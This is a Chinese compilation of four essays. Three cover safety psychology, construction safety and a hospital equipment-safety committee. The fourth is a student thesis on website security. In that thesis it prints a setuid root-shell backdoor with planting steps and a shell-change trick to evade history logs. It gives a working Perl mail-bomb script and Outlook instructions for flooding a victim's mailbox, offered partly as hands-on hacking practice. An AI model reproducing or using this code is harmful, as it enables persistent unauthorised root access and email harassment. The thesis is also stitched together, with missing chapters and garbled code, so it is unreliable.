第一篇:浅谈安全行为科学与安全管理
浅谈安全行为科学与安全管理
一般地说,企业生产过程中发生事故的原因可归为内因与外因两大类。内因是指劳动者的技术、心理活动等方面出现了与企业要求不相协调的情况:外因是指设备状况、预防措施、防护用品以及劳动环境的条件不符合安全生产的要求。国内外大量事故统计表明,在企业内所发生的事故中,70%~75%是由于劳动者的操作行为发生错误或违章作业所引起的。而心理学研究告诉我们,人的行为是由人的心理状态支配的。因此,安全管理人员在分析和研究事故发生的内因条件时,必须调查事故发生时人们的心理活动,亦即借助于心理学的理论和研究成果来指导安全管理工作。
行为科学是从社会学和心理学的角度研究行为的一门科学,它是研究人的行为规律,主要研究工作环境中个人和群体的行为。
安全行为科学是行为科学的重要应用分支,安全行为科学不但要应用行为科学研究的成果为其服务,同时安全行为科学为行为科学丰富了内容和扩大了内涵。因此,安全行为科学与行为科学是相互交*和兼容的关系,是行为科学在安全中应用而发展起来的应用性科学。人的安全行为是复杂和动态的,具有多样性、计划性、目的性、可塑性,并受安全意识水平的调节,受思维、情感、意志等心理活动的支配;同时受道德观、人生观和世界观的影响:态度、意识、知识、认知决定人的安全行为水平。
影响人的安全行为的个性心理因素有以下几个方面:
1.情绪对人的安全行为的影响。情绪为每个人所固有、受客观事物影响的一种外在表现,这种表现是体验又是反应,是冲动又是行为。
2.气质对安全行为影响。气质是人的个性的重要组成部分,它是一个人所具有典型的、稳定的心理特征。气质使个人的安全行为表现为独特的个人特色。人的气质对人的安全行为有很大的影响,使每个人都有不同的特点和安全工作适宜性。
3.性格对人的安全行为的影响。人的性格是每个人所固有的、最主要的、最显著的心理特征,是对某一事物稳定的和习惯化的表现方式。性格表现在人的活动目的上,也表现在达到目的行为方式上。
影响人的安全行为的社会心理因素
1.社会感知对人的安全行为影响。感知是眼前客观刺激物的整体属性在人头脑中的反映,人的社会感知与客观事物的本来面貌经常是不一致的,这就是使人产生错误的知觉或者偏见,使客观事物的本来面目在自己的知觉中发生歪曲。
2.表现在价值观对人的行为影响。领导和职工对安全价值的认识不同,会从其对安全的态度和行为上表现出来。
3.角色对人的行为影响。角色实现过程就是个人适应环境的过程在安全管理中,需要利用人的这种角色为其服务。
其中社会感知对人的安全行为影响最大,长时间影响可使人产生一种潜意识(或下意识)的安全行为。
影响安全行为的主要社会因素
1.社会舆论对安全行为的影响。包括社会舆论的监督和社会舆论的宣传。基于这个原因通过各种形式在施工现场进行安全宣传活动及目前社会舆论对安全生产监督是很有必要的。如“万里行”和“安全月”等安全宣传活动及各种安全事故调查和处理的报道。
2.风俗与时尚对个人安全行为影响。风俗与时尚对安全行为的影响既有利的一面,也有不利的一面,我们可以通过企业安全文化的建设实现扬其长,避其短。
环境状况对人的安全行为的影响
人的安全行为除内因影响外,还有外因(环境)的影响。环境变化会刺激人的心理,影响
人的情绪,甚至打乱人的正常行动,物的运行失常及布置不当会影响人的识别与操作,造成混乱和差错,打乱人的正常活动。
企业安全价值观规律处于中心支配地位,而物的规律和职工心理运动规律是安全价值观规律的基础,左右着安全价值观规律的运动方式。物的规律影响着职工心理运动方式和安全价值观,职工心理运动规律同样也影响着物的规律和企业安全价值观规律。从实际情况分析,职工心理规律可能是决定安全生产的最基础最直接的因素。这是因为:随着改革的逐步深入,企业管理方式正在或已经发生了深刻变化。
目前很多国外企业的安全研究出现的一个新现象是越来越重视对职工个人思想和行为特征对安全生产影响的研究,比如酗酒和滥用药物对安全的影响、比如工作压力和职工的精神耗竭问题的研究、比如显示屏对人体进而对职工身心健康的影响等等。
影响安全行为的心理因素实证分析
职工心理呈现复杂多元性,但并非毫无规律性。安全心理学中有一个著名的事故倾向理论假说。它认为,事故总是由少数几个人造成的,即50%的事故是由10%的人造成的。
1)小部分工人(如20%)造成了大部分(70%)事故。国外的另一项研究结果认为,事故年龄为17-28岁之间的人群中最频繁,50-60岁的人群中达到最低。
2)工种越特殊、工艺越复杂,对人的心理素质要求越高。国外的研究认为,工人的知觉技能等于或高于运动技能,工人就相对安全;但是当知觉水平低于运动水平,雇员就有事故倾向,并且二者差异越大,事故倾向越大,通俗地说,反应速度快于知觉速度的工人更可能发生事故。
3)绝大多数事故发生在工作的中后期,而此阶段恰恰是职工心理呈现“云团状”。众所周知,企业管理理论已经从18世纪的“经济人”、20世纪30年代的“社会人”、60年代的“自我实现人”发展到今天的“复杂人”(60年代由美国心理学家E•H•沙因提出)。复杂人理论认为,人的需要的动机模式是多种多样的,因此管理需要“常变”。这个重要管理思想对安全管理的启发就是,企业制定安全政策、进行安全管理要建立在“复杂人”的基础之上,把“人”想得复杂些,而不能把“人”当成是执行政策的机器。怎样把“人”想得复杂些呢?有以下几个方面
(一)注意力问题:注意(at-tention),是指心理活动对定对象的有选择的集中。注意具有选择的功能,这就是使心理活动指向于那些有意义的、符合需要的、与当前活动相一致的各种刺激,而避开或抑制那些无意义的、附加的、干扰当前活动的各种刺激,也就是使心理活动具有一定的方向性;注意具有保持功能,即当外界大量信息进入感知记忆以后,每个信息单元必须经过注意才能转换成一种更持久的形式而得到保持;注意具有对活动进行调节和监督的功能。因此研究人的注意问题对实践、对安全生产关系极大。
安全管理者的责任在研究职工注意力问题时,须把握好职工的注意分配和注意广度。研究表明,注意分配取决于同时并进的几种活动的性质、复杂程度以及对活动的熟悉或熟练程度。也就是说在安排工作时要尽可能避免同时做二种及以上不同性质的活动,活动的难易程度要配合得当,要加强职工的技能训练以提高职工现场的注意力;在注意广度方面,相关的研究表明注意的对象越集中,排列得越有规律,越能成为相互联系的整体,从而职工在同一时间内能够清楚地觉察或认识客体的数量就越多。注意的广度也随着活动的任务和个人的知识经验不同有所不同,因此,提高活动的意义性、趣味性,也是提高注意广度的有效办法。
(二)疲劳问题:疲劳是指因持续工作造成体力及工作效率下降并伴随着疲惫感的生理现象。它具有“一过性”特点,即经过休息一般都可恢复过来。疲劳分生理疲劳和心理疲劳两种。生理疲劳又称肌肉疲劳或体力疲劳。这在现代化大型企业中,更多的是心理疲劳,即主观疲劳或精神疲劳。
疲劳随工作时间延长而增强。在开始阶段,人的工作能力逐步释放出来,随即达到最佳状态,经过一段时间,由于持续工作,疲劳不断积累,人的工作能力开始下降,出现疲劳现象。值得注意的是如果造成过度疲劳后,即使按作息时间休息,也不能使工作能力得到充分恢复。
(三)情绪的问题:情绪是意识中最重要的构成因素,对人格的整合提供动机。一方面,情绪对人的认知的发展和认知活动起着监督作用。在情绪一一认知运动的相互作用中,情绪是认知发展的契机,它激发人去认知、去行动,例如,兴趣激起研究行为,决定认知的选择性和方向:而痛苦、愤怒或紧张的情绪则使认知活动变得刻板和狭窄+限制知觉和思维,并干扰利用线索和采取变式。另一方面,情绪对人格的整合提供动机。因此,安全管理者掌握好情绪理论,把握好职工情绪特点,调节好职工情绪对于职工很好地认知企业安全价值观、保证安全生产有着十分重要的现实意义。
第二篇:安全行为科学在建筑工程中应用
安全管理科学在建筑工程中应用
姓名:陈松 学号:05109230 专业:土木工程(民用)
摘 要:安全问题是工程建设的一个重大问题,需要在建筑工程中引入安全管理科学的指导,依据建筑工程安全问题和安全事故问题,提出了加强当前建筑工程中安全管理科学在建筑工程中的几点建议,目的是为了进一步预防和有效管理建筑工程项目,完善建筑工程中的安全管理措施。
关键词:建筑工程;安全管理;科学管理
建筑业的生产活动危险性大,不安全因素多,是事故多发行业。近几年我国建筑业的死亡率是所有工业部门中仅次于采矿业的最高的行业,损失巨大,令人痛心。现在需要应用科学的现代企业安全管理模式,不断提高安全管理水平,真正把安全管理工作做好。因此,做为建筑企业,应认真研究建筑业安全管理的现状,树立新的安全管理的理念。
一、建筑业项目安全管理的现状
(一)建筑业的安全事故绝大部分发生在施工现场,可以说,施工项目是事 故发生的发源地。
因此,我们必须对我们的项目安全管理模式是否满足安全管理科学的需要、是否符合项目管理的特点、是否满足国家和行业法律、法规的要求进行认真分析,从而,达到改进或更新项目安全管理模式的目的。
(二)安全事故的原因分析
1.人的不安全管理,是事故的直接原因。
所谓人的原因,是指由于人的不安全管理导致在生产过程中发生的各类事故。人在生产活动中,具体不安全管理有:操作错误(启动操作不给信号、忘记关设备)、奔跑作业、送料过快、以不安全的速度作业;使用不安全设备;用手代替工具操作;物体的摆放不安全;冒险进入危险场所;在起吊物下停留作业;机器运转时加油、清洁、修理;有分散注意力的行为;未使用防护用品;不安全着装;工作时说笑打闹、带电作业等。
2.物(设备)的不安全状态,也是事故的直接原因。
对建筑行业来说,“物”包括施工过程中所涉及的设备、材料、半成品、燃料、施工机械、机具、设施等。不安全的情况有:施工电梯的限位失灵,造成冒顶;塔吊的钢丝绳脱丝;未及时更换,造成钢丝绳断裂,掉物坠落;电锯等用电设备电线老化,造成电线失火等。
I
3.不良的生产环境对人的行为和物的状态产生负面影响。
事故的发生都是由于人的不安全管理和物的不安全状态直接引起的。但不考虑客观的情况而一概指责施工人员的“粗心大意”、“疏忽”也是片面的,有时甚至是错误的。还应当进一步研究造成人的过失的背景条件,即不安全环境,如照明光线过暗或过强导致作业现场视物不清;作业场所狭窄、杂乱;地面有油或其他影响环境的东西等。与建筑行业紧密相关的环境,就是施工现场。整洁、有序、精心布置的施工现场,事故发生率较之杂乱的现场肯定低。到处是施工材料、机具乱摆放,生产及生活用电私拉乱扯,不但给正常生产、生活带来不便,而且会引起人的烦躁情绪,从而增加事故隐患。当然,人文环境也是不能忽略的。如果某企业从领导到职工,人人讲安全,重视安全,逐渐形成安全氛围,更深层次地讲,就是形成了企业安全文化,那么这个企业的安全状况肯定良好。
4.管理的欠缺是事故发生的重要因素,有时甚至是直接的因素。
人的不安全管理和物的不安全状态是事故发生的直接原因,都与管理有直接的关系,因此,管理不善是造成安全事故的间接原因。人的不安全管理可以通过安全教育、安全生产责任制以及安全奖惩机制等措施减少甚至杜绝。物的不安全状态可以通过提高安全生产的科技含量、建立完善的设备保养制度、推行文明施工和安全达标等活动予以控制。对作业现场加强安全检查,就可以发现并制止人的不安全管理和物的不安全状态,从而避免事故的发生。常见的管理缺陷有制度不健全、责任不分明、有法不依、违章指挥、安全教育不够、处罚不严、安全技术措施不全面、安全检查不够等。
由此看来,安全管理的目的就是保证良好的施工环境,保证人和物的安全状态,这些都需要通过建立科学、合理的安全管理模式,并通过安全管理模式的正常运行来达到目的。
二、建筑安全的管理措施
(一)改变安全管理科学教育的现状,实行分级负责、分级教育。
各类人员必须具备相应执业资格才能上岗。所有新员工或从事新的工作必须经过三级安全教育,即公司、项目部、班组的安全教育,并要定期培训,不断学习新工艺、新技术,强化工程特点所带来的安全风险和具体作业安全要求。
(二)加大科技投入,做好科研合作。
鼓励施工企业加大安全生产的科技投入,加强与科研单位和高等院校合作,研究、开发、推广一批安全适用、先进可靠的生产工艺、技术措施和装备,淘汰落后工艺,通过科技进步提高企业的安全生产保证能力和安全生产水平,要充分利用中介机构和社会力量做好工程质量安全监督工作,充分发挥中介机构和社会监督的制约作用,从而把质量安全的监管工作全面引向深入。
II
(三)加强风险评估,做好重点管理。
建筑施工企业应针对不同的项目特点和不同的施工阶段分析安全风险,作出评估,并对每个项目具体化,做好安全防护和重点管理。
(四)编制安全措施,执行科学程序。
按照建筑施工安全法规标准的要求,结合工程的特点编制安全技术措施,遇有特殊作业(深基坑、起重吊装、模板支撑、人工挖孔桩、临时用电等)还要编制单项安全施工组织设计方案,并按程序经审核批准后才能进行。
(五)搞好“五定”,认真落实。
对查出的安全隐患要做到“五定”,即定整改责任人,定整改措施,定整改完成时间,定整改完成人,定整改验收人。
三、项目安全管理模式
(一)全员安全管理科学管理模式
1.注重培育全员安全管理科学的文化
这种全员安全管理科学管理模式是“全员、全方位、全过程、全天候”的管理,因此,其安全文化应该是全员安全文化。形成新的安全文化就是要培育全员安全文化。全员管理不仅包括总承包管理人员、分包管理人员和全体工人,还应包括业主、设计、监理及社会相关方。
作为总承包方,要积极调动和发挥相关各方安全管理的监督作用,使安全管理成为压倒一切的工作。当然,首先要充分调动本单位全员安全管理的积极性,形成全员安全文化。只有形成全员安全文化,才能营造安全生产的氛围,保障人员安全。全员安全文化是新的项目安全模式的核心。
2.全员安全管理科学管理模式的四个转变
全员安全管理科学管理模式与传统的项目安全模式相比,有四个转变,分别是:变单纯的安全专业人员的岗位安全管理为全员参加的体系安全管理;变单纯的安全管理为安全管理与进度、工序穿插和施工方法紧密结合的综合管理;变以点为主的间断的、静止的管理为线面结合的、连续的、动态的管理;变并行的安全与生产两条线为安全与生产紧密结合的安全生产一条线。
3.全员参与是全员安全管理模式的核心
全员安全管理模式下,项目安全管理组织已经不再是单独的岗位安全管理组织,而是以项目经理为首的,以专职的岗位安全管理为核心,以各专业工程师为 III
骨干,班组长及工人全员参与的,安全监督管理层和安全管理实施层既独立设置又互相依托和紧密联系的体系安全管理,是将生产与安全的紧密结合的组织,是对项目安全管理资源的充分挖掘和充分利用。
(二)安全目标管理模式
随着安全管理工作的不断进步,安全管理由定性逐渐走向定量,先进管理经验和方法得以迅速推广。目标管理应用于安全管理方面,称之为安全目标管理。它是生产企业确定在一定时期内应该达到的安全总目标,分解展开、落实措施、严格考核,通过组织内部自我控制达到安全目的的一种安全管理方法。它以总的安全管理目标为基础,逐级向下分解,使各级安全目标明确、具体,各方面关系协调、一致,把全体成员都科学地组织在目标体系之内,使每个人都明确自己在目标体系中所占的地位和作用,通过每个人的积极努力来实现特定组织的安全目标。
制定安全目标要具体,根据实际情况可以设置若干个,例如事故发生率指标,伤害严重指标,事故损失指标或安全技术措施项目完成率等。但是,目标不宜太多,以免力量过于分散,应将重点工作首先列入目标,并将各项目标按其重要性分成等级或序列。各项目标应能数量化,以便考核和衡量。
参 考 文 献
[1]王建华,孙启燕.试论建筑工程与安全工程[J].人民黄河,2004,26(10):33-36.[2]浪底工程咨询公司.关于施工安全工作的实施意见[R].郑州:建筑委员 会,2001.[3]山西省万家寨引黄工程公司.山西省万家寨引黄工程施工期规定[R].1999.IV
第三篇:质量与安全管理
乌兰浩特市人民医院
器械科医疗设备质量与安全管理小组
一、医疗设备质量与安全管理小组成员
组
长: 陈鹏义
成员: 于洋
邢有
张国晋
设备使用监管:于洋
放射机房监测:邢有 特殊装备监测:于洋
乌兰浩特市人民医院
医疗设备质量与安全管理小组职责
1、组长负责落实“医疗装备质量与安全管理”内容要求,建立医疗装备质量管理小组及制度,体现对全院的设备质量全面管理。
2、医疗装备质量与安全管理小组至少每半年召开会议一次,遇特殊情况随时召开,讨论总结全院的医疗设备运行情况,对存有缺陷的科室发《医疗装备质量持续改进反馈表》,并针对所发现的制度和流程上存在的问题,提出改进措施,并在下一次会议中对改进措施的效果进行评价,以做到医疗装备质量的持续改进。
3、严格做好设备使用情况监管、放射机房监测等工作,认真听取使用科室对医疗设备使用管理方面的意见及建议
4、对各科室服务过程中不足的地方应及时改进。
5、制定全员培训计划,做到知识不断更新,积极引进新技术新业务。
乌兰浩特市人民医院
医疗装备质量与安全管理制度
1.重点抓好医疗装备核心制度的落实:医疗装备的管理、使用、维修、装备意外应急管理等制度。
2.加强医疗装备质量关键环节的管理。
3.加强全员质量和安全教育,牢固树立质量和安全意识,提高全员质量管理与改进的意识和参与能力,严格执行《医疗设备安全管理制度与规范》。
4.设备使用监管组每月随机下科检查一次,机房监测与特殊设备监测组每季度下科检查一次。
5.加强全员培训,全员“基础理论、基本知识、基本技能”必须人人达标。
6、按照中华人民共和国《放射性同位素与射线装置放射防护条例》有关规定,实行许可登记制度,医院内有放射性同位素与射线装置的科室必须向医院上级主管部门申请许可证。甲、乙类大型医用设备必须办理大型医疗设备配置许可证。
7、医院所有医疗设备必须由厂家专业技术人员进行安装、调试或计量,验收合格后方可投入使用。
8、医疗设备的操作人员应由厂家进行专业培训后方可上机操作,大型医疗设备的操作人员须持上岗证,并严格按照每台医疗设备操作规程执行。
第四篇:毕业论文安全与管理
题 目:网站安全与管理
摘要
本文侧重在网站安全方面来谈,讨论了网站常用的保护方法,详细地分析比较了专用网站保护软件采用的各种技术实现和优缺点,并指出了其缺陷。安全虽不是使用某个工具或某些工具就可以解决的,但使用这些工具能帮助提高安全性,减少安全风险。只有更好的保障网站的安全,才能便于网站的管理。
关键词: 安全配置、防火墙、网站安全
目录
第一章
查出黑客所在
首先,就要查出黑客所在才能更好的防御。查出黑客所在有两种方法:
1.用w指令查看系统信息
$w
9:01pm up 10:08, 1 user, load average: 0.08, 0.06, 0.05 User tty login@ idle JCPU PCPU what
notes console 10:54am 9days 28:04 23:29 /usr/dt/bin/dtscreen-mode blank
notes pts/2 10:54am 10:07 /sbin/sh notes pts/4 10:54am 10:06 /sbin/sh notes pts/5 10:56am 9:59 /sbin/sh
在w显示信息的最开头是发出w命令的时间、系统启动后的时间、及注册在系统的用户数。最后的三个数表示平均负载,即使用系统资源的程度,使用w命令给系统增加了0.08负载。其他两个数字分别表示在最后5分钟及十五分钟内系统的平均负载量。
注意:当有人在猜password时,将会大大增加系统的平均负载。
2.进程记帐
Unix 系统可以通过设置选项来让核心在每个进程结束时产生一个记录。这些记录所产生的报告被称为进程记帐。它包括进程使用资源的信息,以及所执行的命令名。如果运行 的是调整用户id程序,则还包括用户名等。系统管理员可根据进程记帐的CPU时间让用户交纳上机费,也可用进程记帐来观察某一用户执行了哪些命令。进程记帐和审计是两码事,审计是监视对安全性敏感的事件。进程记帐并不记下所执行 命令的参数,所以无法知道某一命令修改了哪个文件,甚至也不知道此命令的执行是否成 功。但系统管理员仍然可以在进程记帐中找出某些线索。基于System V的系统和基于BSD的系统在进程记帐方面所采纳的方法不同,命令也不 一样。
2.1 System V记帐
在System V 中,进程记帐保存在/usr/adm/pactt文件中。root可运行/usr/lib/acct/startup 来启动进程记帐。记帐信息的日常处理可用runacct命令来做,它会压缩pacct文件。每月 的处理由shell程序monacct来完成。这两个程序都在/usr/lib/acct目录下。acctcom 命令可用来搜索pacct中的内容,并产生报告。例如:查找用户“tommy”在 10:00 至11:30这段时间内所执行的全部命令。$acctcom-u tommy-s 10:00-e 11:30 START BEF: Sat Oct 10 11:30:00 1998 END AFTER: Sat Oct 10 10:00:00 1998 COMMAND START END REAL CPU MEAN
NAME USER TTYNAME TIME TIME(SECS)(SECS)SIZE(K)cat tommy pts/3 11:01:13 11:01:13 0.02 0.02 492.00 mail tommy pts/3 11:01:13 11:01:13 0.02 0.02 876.00 clear tommy pts/3 11:01:14 11:01:14 0.03 0.01 744.00 ls tommy pts/3 11:01:16 11:01:16 0.03 0.03 776.00 date tommy pts/3 11:01:23 11:01:23 0.01 0.01 664.00
acctcom命令用来告诉系统管理员某一用户干了些什么,而不是正在干什么,而且它指 列出了命令名,没有参数。所以,从中发现一些线索,如可找出使用大量cpu时间的进程(典型的是猜口令进程)。
可用shell程序runacct来产生几个报告。这些报告存放在/usr/adm/acct/sum目录下,其文件名格式为rprtMMDD。报告的第一部分包含“变更”信息,如进程记帐启动及关闭的 时间(关闭记帐可能是由于某人想隐藏某些活动),以及系统时间的改变。第二部分是每个 用户注册到系统的时间以及有关每个端口的报告,还包括了每个端口上“接通”和“断开” 的次数。“接通”表示一次成功的注册,“断开”表示退出系统或注册失败。
大量的“断开” 可能意味着有人在试验“注册名,口令”序列组试图侵入系统中。报告的最后一部分是有关用户最后一次注册的信息,这个最后注册报告是随着用户的 不断注册、退出而时刻更新的。报告中还包括用户名及最后的注册时间,越早退出系统 的帐号排在越前。这个报告对于发现那些死帐号非常有用,管理员可能会在这里发现一 些奇怪的事情如有人注册到系统管理的帐号中(如bin或sys)。
2.2 BSD系统的记帐
BSD系统的进程记帐用/usr/etc/accton程序启动。默认的记帐文件为/usr/adm/acct 只要启动了进程记帐,该文件会增长得很快。BSD有两条命令来处理记帐信息。第一条是 /usr/etc/ac,处理在usr/adm/wtmp文件中的注册信息,第二条是 /usr/etc/sa,产生已用 命令的小结报告,保存在/usr/adm/savacct文件中。
BSD系统中也有与acctcom类似的命令叫做lastcomm。lastcomm命令反向搜索/usr/adm/acct 文件,产生出与acctcom命令相似的结果。
BSD记帐系统也和System V一样,有类似的缺陷(从安全性角度讲),即不保留命令的参数。并且,BSD系统没有最后注册的报告。
现在针对前面的两点防卫措施,从攻的角度来看:
1.对与第一点中用w、who、last、ps等命令,hacker完全可以用程序将自己的记录隐藏 起来,使管理员用以上几个命令都查看不到。当然此时hacker已经把root的权限得到 手(如何得到,下章讨论)。
2.就算最笨的hacker,当他无法隐藏自己时,他也会把整个记录文件删除掉,免得管理员 查到用什么帐号从哪里登录进来,运行了些什么指令。但显而易见,虽然管理员此时(没安装第三方的审记软件时)不能知道谁人在哪里发起攻击,但也无疑地告诉管理员 “你的系统已经给攻破了”。
3.历史文件记录
ksh、csh、sh、bash、zsh都可保存历史文件。其文件如下: sh:.sh_history(sh 也即Bourne shell)csh:.history ksh:.sh_history bash:.bash_history zsh:.history
在运行sh和ksh的用户的相应.profile中,加入HISTORY=100,可指定.sh_history
文件保存该用户最近运行的100条记录。对于csh,则在.cshrc文件中加入, set history=100,则可。用户可以运行history指令来查看历史文件中的内容。对于Ksh、sh 也可运行 tail-f.sh_history 来查看,其顺序是从最近的运行的指令开始。而C shell 是在退出才能更新文件,所以不能用tail来观察Cshell执行了那些命令。这些历史文件比进程记帐更为有用,因为命令的参数也被保留下来,所以可通过执行 执行命令的上下文联系察觉到用户干了些什么。但话又说回来,其实这只起到一定作用而 已。BTW:.profile用于Bourne和Korn shell;.login和.cshrc用于C shell。
4.找出属主为root且带s位的程序:
以root身份执行以下的指令, 找出此类文件,看看是否有可疑的程序存在。
#find /-perm-4000-exec /bin/ls-lab {} “;”
其实在以前post的文章 1284 “系统安全技术的研究” 已有讨论过如何得到root shell 当hacker进入系统后,大部份是利用buffer overflow取得root shell 例如:solaris 中带s位的fdformat,ufsdump,ping等;AIX中xlock;SGI中的xlock;digital中的dop;等等,都给hacker找出其漏洞。当hacker利用这些big bugs取的root shell后,若其想以后还想入侵此系统的话,当然是留下root shell的程序,此时hakcer也不关心原来的bugs是否给fix掉,他/她 不再需要利用bug了,只须运行自己留下的root shell即给。以下给出得到root shell的简单程序:
#cat getrootshell.c void main(void){
setuid(0,0);
execl(“/bin/sh”, “sh”,0);}
编译后得到bin文件。此外,接着写入: #cc-o getrootshell getrootshell.c #chmod 4777 getrootshell #chown root:other getrootshell #ls-al getrootshell
-rwsrwxrwx 1 root other 5 Oct 12 06:14 getrootshell(注意全过程是在取的rootshell后,才可这样做)
这样hacker就在该系统中留下了后门,下次入来后就不需利用还没fix的 fdformat,xlock,dop等bug 的程序了,直接运行getrootshell程序,就可跳成root了。因此,管理员要查清此类型的文件。
现在从攻的角度来看上面两点防卫措施:
1..对于history文件,当hacker进入系统后可以改变shell类型,来使保存他后来所有指 令的history文件失效。因此,当hacker用crack到的帐号进入系统后,第一条所敲的指令 是改变shell类型的指令.example in digital unix下: c:>telnet XXX.XXX.XXX.XXX Digital UNIX(center)(ttyp5)login: tommy Password:
Last login: Sun Oct 11 22:43:51 from HPVC.com
Digital UNIX V4.0A(Rev.464);Sat Feb 7 19:54:12 GMT+0800 1998
The installation software has successfully installed your system.There are logfiles that contain a record of your installation.These are:
/var/adm/smlogs/install.cdfgeneral log file
/var/adm/smlogs/install.FS.loglog for the setld(8)utility /var/adm/smlogs/fverify.log-verification log file center>chsh Old shell: /bin/sh New shell: ksh
其他系统不在此一一列举。
2.对于类似getrootshell的bin文件,hacker也不会真的那么愚蠢到起这个名字,且他们 会将此类型的程序藏在不易察觉的目录下,如果不是老练的管理员是不会发现的。(注:一般来说,hacker不会把getrootshell文件删除的,因为他也不能肯定下次进入系统时那些bugs还是否可以利用,使其变root)
第二章
网站的通用保护方法
针对黑客威胁,网络安全管理员采取各种手段增强服务器的安全,确保文档中的属性符号,不进行屏蔽会对论坛造成严重的后果,网络上不是有很多“小儿科”的聊天室踢人术吗?简单的方式是不允许小于号和大于号的出现,因为所有HTML语法必须包含在这两个字符间,如果程序检测到它们就返回一个错误提示,下面一行Perl代码快速地清除了这两个字符: $user_input=~s/<>//g;当然,还有比较好的选择,就是将这两个字符转换成它们的 HTML换码(特殊的代码),用于表示每个字符而不使用该字符本身。下面的代码通过全部用<替换了小于符号,用>替换了大于符号,从而完成了转换过程: $user_input=~s//& gt;/g;
三、编写简单的邮件炸弹:
利用Perl程序可以非常快速的编写邮件炸弹程序,这种方法比起直接使用别人编写的邮件炸弹要好的多,至少能够真正“体会一下”什么才是黑客。这个炸弹的编译环境是具备一台有CGI权限的网络服务器,同时这台服务器上提供了sendmail命令(当然这一切可以在自己的系统上进行设置),并且还要初步了解有关perl语言的知识。
程序的原理非常简单,就是利用sendmail命令向目标重复发送相同内容的电子邮件,为了控制发送邮件的数量,我们声明一个计数器变量,同时将程序用while()函数做循环,下面是程序的源代码:
#!/bin/perl $file='/user/lib/sendmail';$target='someone@target.com';$count=0;while($count<1000){ open(MAIL,“/$file$target”)|| die“ Can not open $file!n print MAIL”哈哈,你被攻击啦“ close(MAIL);sleep 3;$count++;}
程序就上面这些。Perl属于解释型语言,因而不需要进行编译,直接将源代码上传到服务器上,然后设置成为755或者775型,就可以通过浏览器调用而直接使用了。程序中的$file和$target变量分别定义了sendmail命令的路径和目标的地址,在使用此程序以前要根据个人需要进行修改,而$count变量是我们要发送的炸弹邮件数量,因为发送邮件工作是服务器完成的,因而速度非常快,这个数量可以设置的大一些,我们并不会感觉到程序的缓慢。
四、使用Outlook制作电子邮件炸弹:
相对上一种方法,这个方法更加直接,它不需要专用工具而只需要利用Outlook电子邮件客户端软件就可以轻松完成。首先介绍一下邮件炸弹的基本原理:电子邮件炸弹一般来说分成两种。一种是通过发送巨大的垃圾邮件使对方电子邮件服务器空间溢出,从而造成无法接受电子邮件;另一种方法是无休止的发送相同内容的但很小的邮件使对方接收不过来而放弃自己的电子邮箱。因此我们只要实现其中的一种即可称之为“邮件炸弹”。使用Outlook制作电子邮件炸弹就是利用了上面说的第二种方法,不断的向指定目标发送电子邮件,首先我们要做一些准备工作:申请一个免费的电子信箱,并把这个信箱账号设置到Outlook中,然后选择Outlook工具菜单的“工具”-〉“账号”,选择其中刚刚申请的那个电子邮件账号,然后点击窗口右面的“属性”按钮。在出现的属性窗口中继续点击窗口上面的“高级”标签,更改“发送”设置中的“邮件拆分大小”属性值,这个值尽量更改的小一些(推荐更改成16),确认退出。
这样以后只要使用这个经过设置的电子信箱发电子邮件,只要邮件的大小超过了规定的字节数,Outlook就会自动将电子邮件进行分割,例如一封1600KB的信件,将它拆分成16KB一封的电子邮件发送给对方,对方的信箱中就会出现100多封电子邮件,邮件炸弹的功能就实现了!
五、如何防止电子邮件炸弹:
电子邮件的防范可以从多个方面着手,例如未雨绸缪从开始就谨慎的使用电子信箱,或者也可以亡羊补牢尽快修复电子信箱。在网络上,大多数关于防范邮件炸弹的文章都说的是Linux等系统,而真正涉及初级用户的并不是很多,然是实际更多的人使用的还是Windows系统,即便pop3服务器是Linux系统,现在也没有更多的人通过传统的命令方式接收邮件了,这里将讲述一个与读者联系紧密的防止电子邮件炸弹的方法。
1、不公开信箱地址、准备多个信箱:
早作准备,不让黑客知道自己的电子信箱地址是最好的方法,这就需要使用者在网络上尽量少的公开自己的信箱地址,不要轻易将地址留给不认识的人或者留在电子论坛上。当然,如果可以,使用者可以多申请几个电子信箱,不同的信箱联络不同的人,专门预备出一个公开的电子信箱,一旦受到攻击也不会造成过多的损失。
2、使用软件快速清理炸弹邮件:
使用BombCleaner等炸弹清理软件,可以在不接受信件的时候察看邮件清单,从中选择垃圾信件进行远程删除,这样做可以节省大量下载信件的时间,同时也堵住了通过电子邮件传播的病毒。但是这种方法有它最明显的缺陷:一旦信箱已经被邮件塞满了,就来不及删除上面的信件、而且信发送过来的重要信件也无法接收了。
3、设置信箱过滤:
信箱过滤可以很好的解决上面软件解决不了的问题。过滤器可以设置在本地的电子邮件客户端程序上,也可以直接通过浏览器在pop3信箱的内部进行设置,前者和上面介绍的利用软件基本类似,也是在接收电子邮件的时候对邮件是否属于垃圾或炸弹进行判断,所以在信箱被塞满的时候也不见的起到什么效果。
但是,如果能够在pop3服务器上设置自己信箱的过滤,就可以从根本上避免被攻击的可能了。具体做法是这样的,通过浏览器登陆到pop3服务器上,然后进入自己的信箱,之后找到“邮件收发设置”,并且在其中的过滤器内填写有关发送垃圾邮件的邮件地址(多 个地址可以用分号隔开),并且确认保存,这样就能够在服务器上过滤掉炸弹邮件、保障自己的电子信箱安全了。
4、设置接收邮件的大小:
如果黑客发送过来的不是成百上千封“小信件”,而是一封上百兆的炸弹怎么办呢?这种邮件不需要多少,一封过来就可以把电子信箱塞的满满的,所以用户在设置“过滤”的时候,还要注意“接收信件大小”选项,最好将这个数值控制在电子信箱的三分之一左右。例如使用者的电子信箱空间是三十兆,那么可以通过设置规定接收信件的大小不得超过十兆每一封,如果超过了这个数值,那么来信将被确认为邮件炸弹,而直接被系统舍弃,这样邮件炸弹便再无施展自己的空间了。
第五章
网站保护的缺陷
目前中国国内
80%的网站存在安全隐患,20%的网站有严重的安全问题。一位“黑客”甚至说如果他敲键的速度足够快的话,一天可以黑掉100个网站!这多少可以反映中国网络安全所存在的问题。
